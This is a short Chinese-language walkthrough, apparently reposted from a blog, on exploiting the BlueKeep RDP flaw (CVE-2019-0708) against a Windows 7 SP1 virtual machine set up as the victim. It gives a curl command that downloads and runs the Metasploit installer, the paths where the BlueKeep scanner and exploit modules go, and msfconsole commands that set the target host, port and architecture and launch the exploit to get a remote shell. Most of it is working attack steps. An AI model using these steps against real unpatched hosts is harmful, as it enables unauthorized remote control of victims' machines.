使用VMware 安装Windows7 SP1模拟受害机
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall && chmod 755 msfinstall && ./msfinstall
rdp.rb - > /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb rdp_scanner.rb - > /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb cve_2019_0708_bluekeep.rb - > /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb cve_2019_0708_bluekeep_rce.rb - > /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
msfconsole
展示进入Metasploit的框架reload_all
重新加载0708rdp模块利用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
启用0708RDP模块攻击info
查看工具相关信息以及设置 可见关键设置主要为RHOSTS
\ RPORT
\target
使用
set RHOSTS 受害机IP
设置受害机IP
使用set RPORT 受害机PORT
设置受害机RDP端口号
使用set target ID数字(可选为0-4)
设置受害机机器架构
这里我们使用的是VMware ,那么目标2满足条件
使用exploit
开始攻击,等待建立连接 建立连接以后,使用获得shell,再使用获得交互式外壳 随即完成攻击,成功拿到受害者主机权限
原文:https://www.cnblogs.com/xyongsec/p/11491528.html